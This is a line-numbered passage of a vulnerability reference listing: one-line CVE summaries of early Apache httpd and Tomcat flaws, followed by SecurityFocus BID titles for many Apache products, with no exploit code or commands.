5702| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
5703| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
5704| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
5705| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
5706| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
5707| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
5708| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
5709| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
5710| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
5711| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
5712| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
5713| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
5714| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
5715| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
5716| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
5717| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
5718| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
5719| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
5720| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
5721| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
5722| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
5723| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
5724| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
5725| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
5726| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
5727| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
5728| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
5729|
5730| SecurityFocus - https://www.securityfocus.com/bid/:
5731| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
5732| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
5733| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
5734| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
5735| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
5736| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
5737| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
5738| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
5739| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
5740| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
5741| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
5742| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
5743| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
5744| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
5745| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
5746| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
5747| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
5748| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
5749| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
5750| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
5751| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
5752| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
5753| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
5754| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
5755| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
5756| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
5757| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
5758| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
5759| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
5760| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
5761| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
5762| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
5763| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
5764| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
5765| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
5766| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
5767| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
5768| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
5769| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
5770| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
5771| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
5772| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
5773| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
5774| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
5775| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
5776| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
5777| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
5778| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
5779| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
5780| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
5781| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
5782| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
5783| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
5784| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
5785| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
5786| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
5787| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
5788| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
5789| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
5790| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
5791| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
5792| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
5793| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
5794| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
5795| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
5796| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
5797| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
5798| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
5799| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
5800| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
5801| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
5802| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
5803| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
5804| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
5805| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
5806| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
5807| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
5808| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
5809| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
5810| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
5811| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
5812| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
5813| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
5814| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
5815| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
5816| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
5817| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
5818| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
5819| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
5820| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
5821| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
5822| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
5823| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
5824| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
5825| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
5826| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
5827| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
5828| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
5829| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
5830| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
5831| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
5832| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
5833| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
5834| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
5835| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
5836| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
5837| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
5838| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
5839| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
5840| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
5841| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
5842| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
5843| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
5844| [100447] Apache2Triad Multiple Security Vulnerabilities
5845| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
5846| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
5847| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
5848| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
5849| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
5850| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
5851| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
5852| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
5853| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
5854| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
5855| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
5856| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
5857| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
5858| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
5859| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
5860| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
5861| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
5862| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
5863| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
5864| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
5865| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
5866| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
5867| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
5868| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
5869| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
5870| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
5871| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
5872| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
5873| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
5874| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
5875| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
5876| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
5877| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
5878| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
5879| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
5880| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
5881| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
5882| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
5883| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
5884| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
5885| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
5886| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
5887| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
5888| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
5889| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
5890| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
5891| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
5892| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
5893| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
5894| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
5895| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
5896| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
5897| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
5898| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
5899| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
5900| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
5901| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
5902| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
5903| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
5904| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
5905| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
5906| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
5907| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
5908| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
5909| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
5910| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
5911| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
5912| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
5913| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
5914| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
5915| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
5916| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
5917| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
5918| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
5919| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
5920| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
5921| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
5922| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
5923| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
5924| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
5925| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
5926| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
5927| [95675] Apache Struts Remote Code Execution Vulnerability
5928| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
5929| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
5930| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
5931| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
5932| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
5933| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
5934| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
5935| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
5936| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
5937| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
5938| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
5939| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
5940| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
5941| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
5942| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
5943| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
5944| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
5945| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
5946| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
5947| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
5948| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
5949| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
5950| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
5951| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
5952| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
5953| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
5954| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
5955| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
5956| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
5957| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
5958| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
5959| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
5960| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
5961| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
5962| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
5963| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
5964| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
5965| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
5966| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
5967| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
5968| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
5969| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
5970| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
5971| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
5972| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
5973| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
5974| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
5975| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
5976| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
5977| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
5978| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
5979| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
5980| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
5981| [91736] Apache XML-RPC Multiple Security Vulnerabilities
5982| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
5983| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
5984| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
5985| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
5986| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
5987| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
5988| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
5989| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
5990| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
5991| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
5992| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
5993| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
5994| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
5995| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
5996| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
5997| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
5998| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
5999| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
6000| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
6001| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
6002| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
6003| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
6004| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
6005| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
6006| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
6007| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
6008| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
6009| [90482] Apache CVE-2004-1387 Local Security Vulnerability
6010| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
6011| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
6012| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
6013| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
6014| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
6015| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
6016| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
6017| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
6018| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
6019| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
6020| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
6021| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
6022| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
6023| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
6024| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
6025| [86399] Apache CVE-2007-1743 Local Security Vulnerability
6026| [86397] Apache CVE-2007-1742 Local Security Vulnerability
6027| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
6028| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
6029| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
6030| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
6031| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
6032| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
6033| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
6034| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
6035| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
6036| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
6037| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
6038| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
6039| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
6040| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
6041| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
6042| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
6043| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
6044| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
6045| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
6046| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
6047| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
